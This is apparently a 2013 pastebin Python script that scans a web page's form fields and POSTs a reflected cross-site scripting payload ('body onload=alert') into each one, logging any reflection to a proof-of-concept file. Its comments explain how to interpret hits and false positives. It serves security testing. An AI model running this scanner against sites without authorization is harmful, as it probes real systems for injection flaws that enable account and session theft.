
webscan module - xss-over-post

a guest Mar 20th, 2013 127 Never
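  #!/usr/bin/env python

  # try_POST_xss.py
  #
  # first we GET http://argv[1]:80 + argv[2] to read the page
  # and find out what names/inputs/submits/etc... there are.
  # next we POST those param-names separately with 'payload'.
  #
  # More @ http://hauntit.blogspot.com
  # enjoy.
  #
  # Reading the output:
  # - A hit means the marker from 'payload' showed up in the response body.
  #   That is a lead to confirm by hand, not proof that script runs in a
  #   browser: the same match happens when the value comes back HTML-encoded
  #   (the page is handling it correctly) or when the page simply contains
  #   the digits 2222. The report says which of the two cases was seen.
  # - Each POST carries one field only and always goes to plain HTTP on
  #   port 80, so a run without hits is not evidence that the form encodes
  #   its output.
  # - The PoC file is the target's raw response, i.e. untrusted markup. Read
  #   it as text or in a throwaway browser profile, not in a browser that
  #   holds real sessions.
  #
  # Written for Python 2; the import shim below lets it run on Python 3 too.

  import re
  import socket
  import sys

  try:  # Python 2 module names
      import httplib
      import urllib2  # noqa: F401 -- in the original import list, never used
      from urllib import urlencode, urlopen
  except ImportError:  # same stdlib pieces under their Python 3 names
      import http.client as httplib
      from urllib.parse import urlencode
      from urllib.request import urlopen

  payload = '\'><body onload=alert(/2222/)>;]#/**'
  # if you want I have version 'payloads-from-file' too.

  marker = '2222'  # the piece of 'payload' searched for in each response
  poc_name = 'poc_file_for_POST_xss.html'
  net_timeout = 15  # seconds; without it a silent host blocks the run forever


  def as_text(raw):
      """Return an HTTP body as native str.

      Python 2 bodies already are str and pass through untouched; Python 3
      bodies are bytes and get decoded (undecodable bytes are replaced).
      """
      if isinstance(raw, str):
          return raw
      return raw.decode('utf-8', 'replace')


  def find_param_names(html):
      """Return the value of every name="..." attribute in html, in page order.

      Only double-quoted attributes preceded by a single space match, so
      name='x' and unquoted names are skipped. Repeated names are returned
      repeatedly.
      """
      return re.findall(" name=\"([^\"]+)\"", html)


  def do_post_now(url, path_file, param, poc):
      """POST 'payload' as the value of one form field and report a reflection.

      url       -- 'host:port' string handed to httplib.HTTPConnection
      path_file -- request path on that host
      param     -- name of the single field sent in the request body
      poc       -- binary file object; the raw response is written to it on a hit

      Returns True when the marker was found in the response body, else False.
      Network errors propagate to the caller.
      """
      params = urlencode({param: payload})
      headers = {'Content-type': 'application/x-www-form-urlencoded',
                 'Accept': 'text/plain'}
      connect = httplib.HTTPConnection(url)
      try:
          connect.request('POST', path_file, params, headers)
          response = connect.getresponse()
          print('%s %s' % (response.status, response.reason))  # 200 OK?
          raw = response.read()
      finally:
          # always release the socket, also when the request blew up
          connect.close()

      data = as_text(raw)
      offset = data.find(marker)
      if offset == -1:
          return False

      # find() gives a character offset; turn it into the 1-based line number
      # that the message promises.
      line = data.count('\n', 0, offset) + 1
      print('\t[+- (  POST XSS alert!  ) -+]')
      print('\t [+] Found POST XSS in line: %s' % line)
      if payload in data:
          print('\t [+] Payload came back byte-for-byte (no output encoding applied)')
      else:
          print('\t [?] Only the marker came back (payload encoded/filtered, '
                'or 2222 is ordinary page text) - confirm by hand')
      poc.write(raw)  # untrusted markup, see the header notes
      return True


  def run_scan(argv):
      """Run the whole check for argv = [prog, host, path]; return an exit code."""
      # Validate before touching argv[1]/argv[2]; both arguments are required.
      if len(argv) < 3:
          sys.stderr.write('usage: '+argv[0]+' localhost /path/2file.php' + '\n')
          return 1

      host = argv[1]
      path_file = argv[2]
      if not path_file.startswith('/'):
          # host:80 + 'page.php' would otherwise glue the path onto the port
          path_file = '/' + path_file
      url = host+':80'
      url_file = url+path_file

      print('Target:  %s' % host)
      print('Vuln file:  %s' % path_file)
      print('Full URL to attack: %s' % url_file)
      print('')

      # applies to the GET below and to every POST connection
      socket.setdefaulttimeout(net_timeout)

      # first we must GET page, to read whole text to find
      # if there is any of our 'vulnerable' ('to find') string.
      # (Python 3's urlopen raises on 4xx/5xx, Python 2's urllib does not.)
      try:
          get_connect = urlopen('http://'+url_file)
          try:
              get_response = as_text(get_connect.read())
              status = get_connect.getcode()
          finally:
              get_connect.close()
      except IOError as err:
          sys.stderr.write('GET failed: %s\n' % err)
          return 1

      print('Status of requested page:  %s' % status)

      # what we're looking for:
      results = find_param_names(get_response)

      # The file is (re)created on every run, as before, so an old PoC from a
      # previous target never survives; 'with' closes it exactly once.
      with open(poc_name, 'wb') as poc:
          if results:
              print('-------------------------------------------------------------')
              print('Got some results :) Now we can try to exploit parameters.\n')

          for name in results:
              print('Found param called:  %s' % name)
              print('Do POST now, for URL:  %s  with param:  %s' % (url, name))
              try:
                  do_post_now(url, path_file, name, poc)
              except (httplib.HTTPException, IOError) as err:
                  # one broken request must not end the run for the others
                  sys.stderr.write('POST failed for %s: %s\n' % (name, err))
      return 0


  if __name__ == '__main__':
      sys.exit(run_scan(sys.argv))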